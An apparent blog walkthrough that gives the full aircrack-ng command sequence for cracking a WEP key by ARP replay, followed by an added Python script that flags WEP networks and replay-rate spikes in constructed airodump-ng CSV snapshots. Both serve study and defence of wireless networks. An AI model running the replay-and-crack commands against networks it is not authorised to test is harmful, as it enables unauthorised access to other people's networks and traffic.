First, I created a directory to store the captured packets.

    DIR=$(mktemp -d)

I then installed the utilities from the 10.10 archive.

    sudo apt-get install aircrack-ng

Next, I checked my interface.

    sudo airmon-ng check wlan0

And I stopped any services using wlan0 (avahi-daemon, NetworkManager, wpa_supplicant). Then I started monitor mode on the interface.

    sudo airmon-ng start wlan0

Now, I needed to scan the airwaves, looking for my access point.

    sudo airodump-ng mon0

When I recognized the ESSID I was looking for, I noted the BSSID and channel number. Then, I started replaying ARP requests.

    sudo aireplay-ng -3 -b $bssid -h 00:00:00:00:00:00 wlan0

I let this run for a while in one window. At the same time, I started capturing replies in another window.

    sudo airodump-ng --channel $channel --bssid $bssid --write dump wlan0

And in a third window, I started analyzing the captured data, looking for the key.

    sudo aircrack-ng *cap

It took about 7500 ARP requests and IVs gathered over ~2 hours to divine the key, but it worked eventually, like a charm!
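The same airodump-ng survey that the walkthrough uses to find a target is also what a defender would use to find WEP networks that still need retiring, and to notice an ARP-replay attack in progress: under replay, a WEP access point's data-frame counter (the "# IV" column in airodump-ng's CSV export) climbs far faster than normal traffic would drive it. The script below is an added example, not code from the original post; it parses two constructed snapshots laid out the way airodump-ng's CSV export is organized (the column names and the blank-line separator before the station section are assumed from that layout, and every value in the snapshots is invented), lists the WEP networks, and flags any WEP BSSID whose IV counter grew faster than a chosen per-second threshold between the snapshots.

```python
import csv
import io

# Constructed sample data in the layout of an airodump-ng CSV export:
# an access-point section, a blank line, then a station section.
# Two snapshots of the same survey taken 60 seconds apart; all values invented.
SNAPSHOT_T0 = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-01-01 10:00:00, 2011-01-01 10:05:00,  6,  54, WEP, WEP, OPN, -40,  300,  120,   0.  0.  0.  0,  7, HomeNet, 
66:77:88:99:AA:BB, 2011-01-01 10:00:00, 2011-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  280,  900,   0.  0.  0.  0,  6, Office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2011-01-01 10:01:00, 2011-01-01 10:05:00, -50, 400, 00:11:22:33:44:55, HomeNet
"""

SNAPSHOT_T1 = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-01-01 10:00:00, 2011-01-01 10:06:00,  6,  54, WEP, WEP, OPN, -40,  360, 18120,   0.  0.  0.  0,  7, HomeNet, 
66:77:88:99:AA:BB, 2011-01-01 10:00:00, 2011-01-01 10:06:00, 11,  54, WPA2, CCMP, PSK, -55,  340,  1500,   0.  0.  0.  0,  6, Office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2011-01-01 10:01:00, 2011-01-01 10:06:00, -50, 18400, 00:11:22:33:44:55, HomeNet
"""

# Data frames per second above which a WEP network is treated as under replay.
# Assumed threshold for this example; tune it to the site's normal traffic.
WEP_IV_RATE_THRESHOLD = 5.0


def parse_access_points(csv_text):
    """Return the access-point rows (first section, up to the blank line) as dicts."""
    ap_block = csv_text.split("\n\n", 1)[0]
    reader = csv.reader(io.StringIO(ap_block), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if not row or not row[0].strip():
            continue
        rec = dict(zip(header, (f.strip() for f in row)))
        rec["# IV"] = int(rec["# IV"])  # data-frame counter, compared between snapshots
        aps.append(rec)
    return aps


def wep_networks(aps):
    """WEP-protected access points: these should be migrated to WPA2/WPA3."""
    return [ap for ap in aps if "WEP" in ap["Privacy"]]


def replay_suspects(before, before_after_seconds, after, threshold=WEP_IV_RATE_THRESHOLD):
    """Flag WEP BSSIDs whose IV counter grew faster than `threshold` frames/s
    between the two snapshots; returns (BSSID, ESSID, rate) tuples."""
    ivs_before = {ap["BSSID"]: ap["# IV"] for ap in before}
    suspects = []
    for ap in after:
        if "WEP" not in ap["Privacy"]:
            continue
        delta = ap["# IV"] - ivs_before.get(ap["BSSID"], 0)
        rate = delta / before_after_seconds
        if rate > threshold:
            suspects.append((ap["BSSID"], ap["ESSID"], round(rate, 1)))
    return suspects


if __name__ == "__main__":
    t0 = parse_access_points(SNAPSHOT_T0)
    t1 = parse_access_points(SNAPSHOT_T1)
    for ap in wep_networks(t1):
        print("WEP still in use:", ap["BSSID"], ap["ESSID"])
    for bssid, essid, rate in replay_suspects(t0, 60, t1):
        print(f"possible ARP replay against {essid} ({bssid}): {rate} data frames/s")
```

In the constructed data the WEP network's counter jumps by 18000 frames in a minute (300/s), which is the signature of injected ARP traffic rather than a home network's own chatter, while the WPA2 network's growth is ignored because it is not the weak cipher the attack targets. Run periodically against a monitoring card's CSV output, this gives a wireless IDS-style alert; the lasting fix is still the first list, since any WEP network found there remains crackable regardless of how the replay is detected.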